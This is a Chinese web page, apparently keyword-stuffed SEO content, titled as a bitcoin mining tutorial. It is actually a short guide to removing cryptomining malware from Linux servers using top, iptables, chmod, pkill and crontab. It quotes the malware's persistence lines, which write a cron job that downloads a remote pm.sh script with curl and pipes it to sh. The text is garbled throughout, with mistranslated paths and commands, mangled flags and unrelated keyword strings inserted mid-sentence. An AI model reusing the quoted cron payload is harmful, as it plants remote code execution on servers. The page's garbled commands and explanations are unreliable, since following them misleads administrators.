主页 > 下载安卓版imtoken > 个人比特币挖矿教程,挖矿病毒查杀工具

个人比特币挖矿教程,挖矿病毒查杀工具

下载安卓版imtoken 2023-06-07 08:01:08

个人比特币挖矿教程,挖矿病毒查杀工具admin07-13 08:2943 views

近期,受比特币和区块链技术影响,部分云服务被入侵,植入挖矿病毒,利用您的云服务进行挖矿。 本文介绍几个常用的linux命令。 如果您遇到过此类病毒,这些 linux 命令可能会有所帮助。 这些命令并不是彻底清除挖矿病毒的一个方面,往往是不局限于挖矿病毒的常见问题解决方案。

解决方案

以这个挖矿过程为例

398 root 200386 m 78521272 s 300.0.14355336011/tmp/anx qv-B-acryptonight-ostratumtcp 3360//xmr.crypto-pool.fr 3330

命令

topc(查看CPU,根据病毒进程占用CPU高的特点找到病毒程序)))。

iptables-a input-sxmr.crypto-pool.fr -j drop

iptables -a output-dxmr.crypto-pool.fr -j drop(关闭对挖矿服务器的导入和导出访问))。

chmod -x minerd(改变挖矿进程的执行权限)))))。

比特币个人挖矿教程_个人如何挖矿比特币_比特币 挖矿机 个人

pkill minerd(杀死进程)))))。

service stop crond or crontab -r (删除所有描述计划)))。

(以上内容可以说是通用的,即使某个CPU想要禁止高级进程,也可以使用。以下内容可能是个性化内容,只针对一个挖矿病毒。)

因为病毒有这样的代码

导出路径=$路径:/gddg tx:/usr/gddg tx:/usr/local/gddg tx:/usr/sgddgtx

echo '*/5 * * * * curl-fssl 3358 * *.com/pm.sh? 0105008|sh '/var/spool/cron/root

mkdir -p /var/spool/cron/crontabs

echo '*/5 * * * * curl-fssl 3358 * *.com/pm.sh? 0105008|sh '/var/spool/cron/crontabs/root

所以

个人如何挖矿比特币_比特币 挖矿机 个人_比特币个人挖矿教程

从 /var/spool/cron/ 目录中检查现有 root 用户的计时器文件

该命令是

cd /var/假脱机/cron/

以下命令用于删除下载病毒的脚本文件

文件

病毒挖矿主要是利用redis的一些漏洞获取服务器的访问权限,然后移植病毒。更新bug也是有可能的

vim ~/.ssh/authorized_keys

通过删除未知帐号,您可以查看自己的用户列表或删除未知用户。

如果读者只是为了解决问题,看这里也无妨。 下面的内容对每个命令、每个参数的含义等进行了详细的说明,以便于学习方法和解决更多类似的问题。

比特币 挖矿机 个人_个人如何挖矿比特币_比特币个人挖矿教程

命令分析

订单 1

top c(看角色,CPU,可以看出有几个进程在占用CPU,如果一个进程几乎占满了CPU,那么这个进程可能是病毒)。

比如输入这个命令后,如果有挖矿病毒进入服务器,可以看到和上面例子一样的内容。

top命令可以实时动态查看整个系统的运行状态。 它是一个实用程序比特币个人挖矿教程,可以从多个来源全面监控系统性能和运行信息。 通过top命令提供的交互界面,可以通过热键进行管理。

top system time up 系统运行小时数(天) 1 user:1: 系统负载(当前由一个用户登录到平均负载)。 任务队列平均长度 tasks 总进程数 2 运行进程数 86 休眠进程数 0 stopped 停止进程数 0 僵尸冻结进程数 %cpu 其中cpu利用率,us(用户空间占用率 ( sy

接下来的两行是内存和交换区的数据。

订单 2

iptables 命令(作用,关闭对挖矿服务器的访问))。

比特币 挖矿机 个人_比特币个人挖矿教程_个人如何挖矿比特币

iptables-a input-sxmr.crypto-pool.fr -j drop

iptables -a output-dxmr.crypto-pool.fr -j drop

解释一下这个命令,iptables是防火墙相关的命令,参数a是添加的意思,这两个词的作用是添加防火墙规则比特币个人挖矿教程,分别是入口方向的-s -d和入口方向的-j ACTION进入方向:矿沙

订单 3

chmod(更改执行权限))。

chmod -x 矿工

参数x的作用是执行或切换权限。 该命令的作用是取消minerd的执行权限。

命令 4

pkill(杀死进程))。

个人如何挖矿比特币_比特币个人挖矿教程_比特币 挖矿机 个人

pkill 矿工

Kiel 是终止进程的命令。 此命令非常简单,无需进一步解释。

订单 5

service stop crond or crontab -r (删除所有描述计划)))。

crond 是一个守护进程,每分钟唤醒并以 crontab 定义的形式执行任务。

crontab 是一个表的概念,用来描述 crond 将被执行的形式。

总结

介绍了挖矿病毒的清除方法,并详细解释了一些linux命令。 我想再介绍一些这样的指令,说说常用的方法。 病毒在不断变化。 当您阅读本文时,病毒可能已成为过去,但这些 linux 命令不会改变。 掌握了这些命令的知识后,可以先做简单的处理,再根据病毒的个性进行进一步的处理。

相关话题

汇总不同聚合级别的数据-R和tidyverseRocketMQ消息失败重试分析--说明电脑中了挖矿病毒怎么办,linux挖矿病毒扫描工具中了挖矿病毒怎么办,挖矿病毒有哪些